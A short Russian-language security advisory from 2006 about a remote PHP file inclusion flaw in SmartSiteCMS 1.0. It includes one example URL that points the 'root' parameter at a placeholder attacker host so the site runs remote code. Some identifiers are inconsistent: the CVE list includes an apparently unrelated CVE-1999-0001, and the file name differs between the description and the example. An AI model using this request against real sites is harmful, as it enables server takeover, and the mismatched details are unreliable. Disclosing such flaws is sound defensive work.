PHP-инклюдинг в SmartSiteCMS

Дата публикации:
02.07.2006
Дата изменения:
17.10.2006
Всего просмотров:
1217
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2006-3162
CVE-2006-3421
CVE-2006-7074
CVE-1999-0001
Вектор эксплуатации:
Удаленная
Воздействие:
Неавторизованное изменение данных
Обход ограничений безопасности
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
SmartSiteCMS 1.x
Уязвимые версии: SmartSiteCMS 1.0, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "root" в сценарии include/inc_foot.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP. Пример:

http://victim/[smartsitecmspath]/include/inc.foot.php?root=http://[attacker]

URL производителя: www.smartsitecms.net

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: SmartSiteCMS 1.0 (root) Remote File Inclusion Vulnerability

или введите имя

CAPTCHA